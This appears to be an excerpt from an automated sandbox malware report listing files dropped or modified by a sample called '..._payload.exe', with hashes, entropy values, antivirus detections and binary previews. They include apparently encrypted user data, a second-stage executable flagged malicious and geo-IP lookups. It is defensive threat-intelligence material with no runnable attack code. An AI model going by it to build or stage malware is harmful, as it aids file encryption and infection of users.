                                                                                                                                                                      SHA-512:981DB080D2F40C37472009DD3745DA70654B3DC2FB2E83427419C30302FDAC06492FBC47363705A64ECE33BF51F81F7F7E8C6AEBFDCE43A1CA952E44CF1D5882
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLitC(V..M..,.o.(:E.?.A.}.....0oj+..[.u...m......a8...Da...\.RQz..../.;.d.O.)..u.(i.e,@.Kw..#..'h;..{.C.#...u.*.m.N..C.../.Q.qs..fUkR].....)..%.mT.".0...@y....G<.'..Q..e#..#p.d..E..d.jz^..EvS.PA..1(...F..2[......{.T.g..k.f...e.xz.&..G....?.I.;.I3...~.4s~......B.L.....v^.4.({..=.......l...El%..4E$y.(.g<j,jE...G.....)..R....M..*..,...m.u..!.V..s...^..5.fK.2.x..A.A...%...`.=........>.X2.P..F..{..5".O.Y.2...{..n.$.......+..f.....q..(<...>......e.l...%'O.v.P. 3..W.:.....+....`uW..`:...4....0!.04......;.@WdC.r....=...i(.]X..@...S.Ux.h......d...6...U.L..0+..M.5.^....f>.\.b.\.mx".....4.k..n...8.)m....Y.`.................4...=.8.w.l.2%...#..03.,.S.X..v..).o.Y<_..3..@....F..w.9.p(S..<.:..-?...X..N.~k..(...6=.j.s..m..tX4.*...$-...fn.>...C.o./...ir..O.. ..4/..N..We..t.](.O.O[.q5AG.+...@E.R].q#....v...oR.!:wl.C.29.6^6.}...>g.h.s.P.a8.z.c...}.....n+.)_k..1t..C.Y..s.D......-........Kqs.t....Jh.2ZI.\'.....~Y......+..;...2.fxW.....t.u!....B.bfS.f....h..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):3.4249987557960404
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:QvWp1g6JEwf/LL7bo5SedaTB5t089oSwhqugM4:wWpC6JT7LKdai8CrhqA
                                                                                                                                                                      MD5:101767FF50EE6F01DF3436C5C7A6A337
                                                                                                                                                                      SHA1:BC9FF7CF11868E4D78C4D048B0E53D3264C26930
                                                                                                                                                                      SHA-256:A4D7A0D8A1E2DA5F03074098A0DA4E61ED9ADE36297E1212FEE3388CF29AC584
                                                                                                                                                                      SHA-512:A8217919AE6A0FDBD0EAD4A46DA592C16C29EF9C936B9FFA35D2C503574631D7D6FD76588DC6294B58C13FA1C40E798DEFDFA3C2072001DB8B3F4CEB25046171
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLit....%.-.kW...m.g.#U.\ns^..f..wH4>.C3..r.]Z.^.'..*....z.G..w,...*<qI.U..%.d*.l.""..p.H..}M7..(.....o.U;....N..-....!Sw..h..>....s.....1.]iq..u5..v.f......r.m~_C.3.n....&...Cu.._....D.........+?>l~...#...... ^.....]. .s..D.Ya..........v#....@.^6u....>..B.5.\.D......^...9.>...].[.x.w....m....v.|..9.DG.....(.[.5".B.\[.Wk..cM.B..X...&....7.F.Hm.~..i.[..$.dt0...^..`3R..........Qo..[Z....7f.1..*.h.m...wU.b...!.3...0`P.....7)......l...\K...}.[.I........,b..[....wP~..y...q....>..0.:8..}P.....Z... C.......`$.........q..Te.t...~ex=kaH...b.-J.aZ/.a....]P>`$.t.upz......I......u....x...F.l;b..~}....{~.....+..o.OS....4.=.....$..Za.]...9DO..V.3..W..E.....m.c.~...H.........6.z...*.....X.&..j..fITN._........!...8....:Q.V...5.GGOrkX...T.....t^.U).....MS~....}]i.!.C.P.,\.J...[.L..h..'W....[EE.C..f.O...p.Bx.]}./.*a.....m..9.}rKq.J..8($.]........my...9......Y......f0....)l..K5.....zK..m..-&m..)X...C.j.....j....d..FV`k....{.KK....>.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3211264
                                                                                                                                                                      Entropy (8bit):0.6633770167379013
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:USDygDyrTBxrpOzY0DEF6pdzADcIRvBK06w3idV6VTl97sB7FMvfa:xylPv1O9pKvBKiidVaTE7o
                                                                                                                                                                      MD5:37A8D30E777E4553F6287CBE26DBA252
                                                                                                                                                                      SHA1:1710A897FC9F41E425F2E504876A3D5516F4D61B
                                                                                                                                                                      SHA-256:BA71BE9810B441A53722F17E4AFD03B9FC2252384A1272438088C7E886AF2875
                                                                                                                                                                      SHA-512:16F7F4D3B3ACE4A0BF0C995F882F3B865CE6AE1658B1AE5B1FF6DDD30B68EC42BE2B17D79D4645042A3E3A9BEE93FAE84B549CAEC6854A57284C212C59D7BEB1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1G.f.,..u)..J...q.qc+...pcv.T.R4.#.....Z...(.i]I..IyS.G[C.b.,.....,...../.....|\..q ..y..L...6.......3...9.hS7.....n*..L.DM.O...^...^.pX.........EI.._._!3.;ZBHx.'.....T.....>j..#..c....y..TTK.b...$vQ.P.9.T..kB......]..4...]%0".[..r...).`..!...hA....5.9.B....!......g..Xvy.=.a,...K.r..1..]d.....k..)S...i.'... ...v..n..H#Z?%.Oi.F..`.x.d;.|M.l-....^xY..........2..S[.Z..+$]z...._.i.H..2.....9M3>)....G....,....69.....f.(5..S,....)..|..............P4E.........l1.b.<....B..J...M}.......[\.+.]...; :"....xo...K..?...J.....=....zl..Fq.......z|l....,gG.ob.W..=....&.j.`..A.....*{..$.=.<V...W..{R.9.-.O.Zt.p.~.....hx.$h....t....oA.G.)y.c>...[1..)'...SH..k.YM...g.}.L...C.3..+.}9.S.)....4^.C.|.....p.....}..+.+1Lj .kA.g...8....W]x'...$.?C.E." \(..PS...6.)..oB...Z..?.-.u.#..Oc26Qy..U``,b.w.....PG.,..l......./...G&..<.].B.........B..t].....n&.?.G...; ...P.(..........q59.<F%.1.D.+.`j..%Jt.(G.R.Z.....l......0y.o...jC..q.1.....5..!,I.VD..:...5...A

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):3.427514833370294
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:epz7Ka5ZYljI6K8s9fSRjL6AVdHembBB0mbjfNCIOIXRa:C3N2lA8s9fsDtbBWmHMIOIBa
                                                                                                                                                                      MD5:9693457CB6D4A7D5C436300EC3C53DCE
                                                                                                                                                                      SHA1:DAD3A22424EFA4D9A7A065BE14F9804F2CCB8AA5
                                                                                                                                                                      SHA-256:0754D6543F207177CDB042834A0C1AB68E284827C08C7E104535843D10EFDDD1
                                                                                                                                                                      SHA-512:4147C112656D39B9FFB7B29D74785D945E1CB038714292BC620B459C4CB68AA17F8F1AFA2A32563B95A0CC600B2E150AA079321B504AC87269D65E24F6E8A6FE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLitG.L...Q6z....I..c..%J..w.d......j..<..k}}.....j.|.%.aA..s#........e..Y..<..G..$..W.....O.... ......NDm......G..V.5XI..B...3...P.....,O7.......#.......=J...M....L.AM........[rS....8..9..O,../v..\..K...fF....4.....@.....;......'2$eC.jr.N..p..e0{...I...S.b......0sV....3..<....).. ..`....7..\/..Z..8.\.ar..B.........!NOt\@...G.~.nO.V..~V.8_.9Bg...w..'w{.1i...N..p.`M..l1sU....akq..n.X..Au.=Pz.*..<..X....<...wZ+.g..j..d....8iQ.+7....-s-...V...3..f..X..L!.Y. ;...F7...C..G2...?o..I.._B'..a.W...u.9..."{.}^^=&...G.0%..?.k..AL..j.J..R[./.C.?.R.#..4 .k.Jk.......|HM...YO...I...3..7..4|oU0FD..r...)bw...HM.u...._p{#..E@7...J.n.{.Y..D.C...3B..../...[.'Si.Hd.X......`..E.....@..:...E.\........<.T[....*._...fU.V........-...}.J[....*.NB<..o..J.h.....-.X..8..,<...o.^o..}.....z<..<m...iW-.V.....uK..$y........{.B...".C4D.g........[.\a..^.V..`.".->>..+.....~].._.M...x.U.X.WIp/`.L...0 ME..CU...f?..E....WQ....h-.Q[...U~.I..F........=~..%.~..d.M..U>.g3.c.O.~..uh]

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1353
                                                                                                                                                                      Entropy (8bit):7.829696781632306
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Y/gGOmx4572N09ePRiPw3sBV8Hi75Xj7ojtXj//nQLYyWaz28qn0FE42bD:Y/gGtU2mePRuw3ssHg17CVzQ0yW2QjD
                                                                                                                                                                      MD5:3BF6E4280314816156CE73BCCCA501D4
                                                                                                                                                                      SHA1:A2F04239F17A97B16B7860E588866BFB7DCAE0E6
                                                                                                                                                                      SHA-256:DB153322CBA06317C52867E930B8FA4E53D50E4798AA3760EDC6B4910E8312A7
                                                                                                                                                                      SHA-512:273854DA20203B21169514AC1B2E2AAC0173A0F53942BD2D2C3688F8083B2E04D9D5B532EA8951DB86C01691681DDCD9F64D786470B8EEA36BE6F530370653AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"Rec.r;.. .R...M....f.Ec...T(.J|.b..%...z!YDf.M.G..5kmkZS.Hso.c..{.G........(....g. .Q-.A.>K...{.b.B...U.:.Uh."..E-/.P../_...E..,l.O.,...r...[............7...1...o...Np..nn.a....cd'.8.....4\(.z.$.c.kFk..6&nq.}.C..6.'....\..sk..N.....C...._.w+nL.GU..n.(...wp..-T...=s......o,.9'.f~.ra..#.7..t@.#i..G..h.L.n.@...)3.hV.W.}....Bz...x......3}....G..C...q...K....l".2%..W....5....(.L..}.(P.>A....x?.-.......$m5.{z*c8..DD.........F....I.:5-g.k...^..d6`.=..)...Zf"........0......i....J.F...E...D..}h|......4...s.L..[v(.5j..?$9t...>..S...Z>...:.M.y..C$^....6...BY|b...`....pE...c.. ..8LPK.:!/....yG.LPz6.....8.?,........[l"i.t.....8.g.!......q.n.0Q8.......,.7.X.q.}~.6....:.E..y{.....8...B..;..Q..K.3.I@.1...".G..(F.q$Z..O....V..F.....=r..0H....Z45..O8.....BA....Z.n^~..9G}...I..N!...v.@...f.w.B.j..q.7..p.T2.-..^a.Sn|.L.+|......ic...A.....FQ.hD.Z..L..n..[...Y..\.P..}..j..mk..2>..p..V;2......C.....J..............!..\`.i...T.}&[.|y.^s..^.o.y4..G..u....<..x....z.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):367104
                                                                                                                                                                      Entropy (8bit):6.976668751990096
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:pfLgtyckjU51Vc7lLUvTlR2agQAYNMQSnjbeg:pfMtycGU5/klLUvTlR5Aiuv
                                                                                                                                                                      MD5:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      SHA1:3FB4182921FDC3ACD7873EBE113AC5522585312A
                                                                                                                                                                      SHA-256:26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                                                                                                                                                                      SHA-512:C7569CEA7F1A841E7CAC9CD41287DBA3BCACF2CF9DEE7BECE88800848A7AD5DC4CD2BDC896C7389F0F1144079BBE168048B3F722BCD76FA5D6E14F3081BB6427
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: UpS8Qm873s.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: g0Zq7nJjus.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: E0tabE4K4r.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: sbvN2ih5AU.exe, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...:...5...:...v...:........A..'...$...x...:...%...:...%...:...%...Rich$...........................PE..L......d............................."....... ....@.................................W}......................................\U..(............................................................H......XH..@............ ..t............................text...y........................... ..`.rdata...=... ...>..................@..@.data...|....`.......P..............@....tls................................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                      Entropy (8bit):4.744298235175777
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YZOXwpHEx6uAsBzdI/p3dI/pa33m7c2JSydz:YRHDZsvIjIsm42cydz
                                                                                                                                                                      MD5:3FD05BEBE937C6D38A614D550586B827
                                                                                                                                                                      SHA1:BF15F4611FDD30BC069DA19CE112873F69AD8BB5
                                                                                                                                                                      SHA-256:F557051F4896C7EAF811760F0FCE91A9B6CDB4579C73DE27F878DB143C95B274
                                                                                                                                                                      SHA-512:788B974B89F6311EA7EE03FD5EC9DF53AAE0595269478B8D0E9B8BA38EF47B0020DC0CA2A58125B7BF4145C1D110DE005E17D1A75A01B90124ABDA041CE525B6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","region_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city":"Washington","latitude":"38.89539","longitude":"-77.039476","zip_code":"20001","time_zone":"-05:00"}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\geo[1].json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                      Entropy (8bit):4.744298235175777
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YZOXwpHEx6uAsBzdI/p3dI/pa33m7c2JSydz:YRHDZsvIjIsm42cydz
                                                                                                                                                                      MD5:3FD05BEBE937C6D38A614D550586B827
                                                                                                                                                                      SHA1:BF15F4611FDD30BC069DA19CE112873F69AD8BB5
                                                                                                                                                                      SHA-256:F557051F4896C7EAF811760F0FCE91A9B6CDB4579C73DE27F878DB143C95B274
                                                                                                                                                                      SHA-512:788B974B89F6311EA7EE03FD5EC9DF53AAE0595269478B8D0E9B8BA38EF47B0020DC0CA2A58125B7BF4145C1D110DE005E17D1A75A01B90124ABDA041CE525B6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","region_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city":"Washington","latitude":"38.89539","longitude":"-77.039476","zip_code":"20001","time_zone":"-05:00"}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\geo[1].json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426
                                                                                                                                                                      Entropy (8bit):4.744298235175777
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YZOXwpHEx6uAsBzdI/p3dI/pa33m7c2JSydz:YRHDZsvIjIsm42cydz
                                                                                                                                                                      MD5:3FD05BEBE937C6D38A614D550586B827
                                                                                                                                                                      SHA1:BF15F4611FDD30BC069DA19CE112873F69AD8BB5
                                                                                                                                                                      SHA-256:F557051F4896C7EAF811760F0FCE91A9B6CDB4579C73DE27F878DB143C95B274
                                                                                                                                                                      SHA-512:788B974B89F6311EA7EE03FD5EC9DF53AAE0595269478B8D0E9B8BA38EF47B0020DC0CA2A58125B7BF4145C1D110DE005E17D1A75A01B90124ABDA041CE525B6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","region_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city":"Washington","latitude":"38.89539","longitude":"-77.039476","zip_code":"20001","time_zone":"-05:00"}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1106998
                                                                                                                                                                      Entropy (8bit):6.500333177860392
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:dxylSMUMifofI9ayCvcZMBiMjCodEMdo8R66tCWko5+jsbFcoYuprzpGSgGSrz:d4AMB3caSZMijBI1CWkoj5auF5gGSrz
                                                                                                                                                                      MD5:1F44D4D3087C2B202CF9C90EE9D04B0F
                                                                                                                                                                      SHA1:106A3EBC9E39AB6DDB3FF987EFB6527C956F192D
                                                                                                                                                                      SHA-256:4841020C8BD06B08FDE6E44CBE2E2AB33439E1C8368E936EC5B00DC0584F7260
                                                                                                                                                                      SHA-512:B614C72A3C1CE681EBFFA628E29AA50275CC80CA9267380960C5198EA4D0A3F2DF6CFB7275491D220BAD72F14FC94E6656501E9A061D102FB11E00CFDA2BEB45
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!.....&...................@.....a.........................0.......:........ ..........................*...........0.......................@...<........................... .......................................................text....%.......&..................`.P`.data...|'...@...(...,..............@.`..rdata..pD...p...F...T..............@.`@.bss....(.............................`..edata...*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc........0......................@.0..reloc...<...@...>..................@.0B/4......8...........................@.@B/19.....R............"..............@..B/31.....]'...`...(..................@..B/45......-..........................@..B/57.....\............B..............@.0B/70.....#............N..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):83120
                                                                                                                                                                      Entropy (8bit):7.997990857942079
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:XwAlfiCew0fnOXd4vEKLkVfZh9l8eV8mSZclpO+Qu1AqD5GCSn1/ZZq8Q:XptJIniyvEKYh9lTrSZclpON/8cCkqj
                                                                                                                                                                      MD5:9A82BB4903F21D7CE785F91FF7FDE5CD
                                                                                                                                                                      SHA1:3DC92720D4404B73D58CDDC35205483DECF1B8C8
                                                                                                                                                                      SHA-256:C5EFDAE5E1662C24E44FE0D902C379D00ECB2056B8FFB022A131B363347863E1
                                                                                                                                                                      SHA-512:07EA2C63CD91973C6E6A2656C39DC17EA39D1E43ECDDBF01C65621569BF2025A462234C2B27A3DCB1C8E510F070C64A140E68C41E0B029A0BC7DD49D5D656785
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:'use ....;.P.n+......|..........[...B..<.........}...N.;.c..*....P."..uyx#..r.@!x.7.(s;..D....+.<...R.1I.....z....J....M..Z......I.e.{.R...._.w$........p.!.i......jRZ..).4z......?.q#.9...8y.N^{ZN.0.%=@R..N........?=...61x....>............]b..I.3.>..a.b...Yn...\..6......I....e..........^&F).i......w.T.cN...s.E`..........].;..C..$.:.I.......lN.v....w.Q<.F.N...0.H.Sv.".u....7.?..,....Ef?t&^....D+..<.k.dO..t.e.J....A.K...*@2.6...z...A..D.Kw..*..b..... .... h.Q..i...u....N..DS><.."}G$..'...A..#'!....[M`...*..`....T.i.V..&M.0.4t..op.0..h. .[.[....kZ.W7.A.M..7.x.(..-.....C.s.20*.A...i...K.Re...5.....,...}:.`P-9E..:~\..bn....\ ...#tex......O.t.9..d.2..mJQ{a.Q8..7..F_...>..A...sB.J..Y..+./...*..d...}M0....c....2....R..P.|Jl...t..),.......i..Uw]..>..'....wt..;...........H..k..s...H....qW...,W.O...n..!........l....%Lp_....g.Y.t...f...^H...A........U..|.........I.<....Q0{Fo..<...c..H.:".I./L+....% ..\#....O.J.'+.jS.h^k..'..!c.....e.u....>B.B.......GkAU.g,

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):31496
                                                                                                                                                                      Entropy (8bit):7.994214236719279
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:768:sebwnKE7uSq/csS0ix/GVAQ/YlvGAaWUb0ZHRpDrL36g4:Hwn5Pq/cGQ/GuIYlNu
                                                                                                                                                                      MD5:0905F602BE88F3C081D6E47BFFCBE470
                                                                                                                                                                      SHA1:04911A65E3AF3E19BDC558E3FE435A54C4BBAA3C
                                                                                                                                                                      SHA-256:77841B32E00D96435C20C8096513651B8C42500C8855766AB1FF5E380F142BAF
                                                                                                                                                                      SHA-512:57A4CFF1FA2789E729AD66C2D44649B28054E3199533AE40257880B5DCFF2A1F43321EF2B576C7126F468A95EB3A72F50D99BB0939491E0589F3A69A8215858F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:'use ..<G+.T....<........u.m.d....-.@.e..<Hz......h..LB......9.......k7]je..qX..sea.<..(..pX....+b......./.1...p...h.X..3<..Q#..P.`..|..pE.@.`.@.;3d....`..J...T...(....0...laejMF.+%...}.x.+aB.W......k.../.X.~X...4.].%qh....O..U}..9......<.Q.....w..>.&.v..."W.....zj..G..U6x.I...b.zU.mfL...e...N.eq.:"R...l....i...*at.7..D....1n..O.M.3N..gT.Q..q.#.Tak.:..x_.d...L...y.....l.....+...~.xr..(...`.....B..8..Bk...)AJ9..Xa.[.p#Z...{........."%!.6..}wO.3....z..e........J-.5[...o.......=.Rh..q.....$..2-...Jg...v..L........Ou.{G.E...O..U...x..3.y..V"......9...6t...-....&....,.U~WdLSt..wr..M?.........D..........T'.7.,..W.h.{.u..2.hOY4..;-.Psu.:.......Z}.....J......]......t!./.T..M.2........?.m~.pT>1..Y[r..%?V.L.>.c4.q......(H|.O..J+.~.Ay.....j...[8M...P...&...I.s..p....kCLMc.D&...4H&R....D.r...y..7KkF...U....[.<...P.?......J..%:.....,G....M...-c9..-.2Z...K......k..:.}.......Hc...Hjl.<.<0.[..g.......,8.>.'..0..)...?.e.H.....$.5..',..N....

                                                                                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\activity-stream.discovery_stream.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1583
                                                                                                                                                                      Entropy (8bit):7.881798028542766
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Y1x5+bio4cyGO2wg3rFnhmxoT6CEqggyH17x+uTCPT06TzEsyRUzJR4o2bD:YL5Fb5NChsO+Hq2H1VUPo6TzaR3D
                                                                                                                                                                      MD5:204746DF3E1647620D57B569887E0C5B
                                                                                                                                                                      SHA1:B1265880CC17D8EC553579D43A5C03CE3EC59A56
                                                                                                                                                                      SHA-256:9F01F8AB39EB5849E1202EAC48567F7BC53C1C11CAD12C668D5349F27D66D499
                                                                                                                                                                      SHA-512:31CB6A9BDBF0D3538E6995D1F4699AFFD64B42BA8259DD5C2AB5F188E057B7A31FFEB55CFA3DFA95D8BE67CCB4BE780FE7712513F3347D3BE28E6B4C027FD724
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"spo5.N..Q..6.R..O..u..*."N. .a..K..Sl6. .n7f..V..J..^.7.aE...I.b...k$LQ......YK...=.....j~.2.z.....2.v$...l...Y.]........(U...8.!.....sY....q...S..P..{....C.UF..+M...,._I..Wg.../.;..~'.kWr..uU.Mv".....h.4.g).....O..#.F.Lq..P\l.9.........c..d.2.E...S..$._..3..d.....;......j...HRzV..I.*.sr?....X&.u....MP.......:.CO.,n..t.5..U...]..H......Zb2c..}NW.../.zG..'.........p..4...I..n._.....[(....[..1.y.spV..O..~)..s....p..U.GH.M.r.#.T[q...hv'...9.hv.&..iF..MZ..........V{....D.H...#.L..y..w-...[....P.g......v.s.Y...}.+-...v*6H_.d.....x..Tf.}...WQ._.U,.B......P......r.......d....8.~[,.C.,,Q.[)..J.6...-.n.....628....k*..p....W.).sD..c......D.?.....HFM....B..io.;........=......a.}TM.rI..p....,....m_...dTf....".$q..^'...K..TA.%D..wT.\u..B.~.vFkfg28...wJ..s[....O..a..*....n..s.....W..X.%'e....#......]2.1V..LU....'...........Q......[BE.w.B.U.W...Q.......[}\d...B..ud.O..$.5.g~..j$..iuc...sJ.....S..P?.......T...R!..,.`i`...^..=.4.0.>..jn..!.@D}0...P

                                                                                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):7915
                                                                                                                                                                      Entropy (8bit):7.976650092916871
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:nT+ehcx48lxyQ47WuINSjQPuD/ooEGCUeOJnffk1DpL:nTzhG48lk7kNhuD/uGS2nnMNL
                                                                                                                                                                      MD5:508B86F95385067A32AE1A54B8FA23E2
                                                                                                                                                                      SHA1:72E9ECA6D9AE79A80BA1B537413A43C27689D615
                                                                                                                                                                      SHA-256:F6217E2D2F6F20ED09BA39D67366911969F947DAFB282B2124EA1B7F6A267328
                                                                                                                                                                      SHA-512:7C0B96C20CE839FE12B15415DDF3F69B29D86DCE837B69CE03FE0A542FCE1C4C537D3431F96DF43E80B4042AF6CFD6017AED3853F65D6C55FBAB4FB8D948D89B
                                                                                                                                                                      Malicious:false
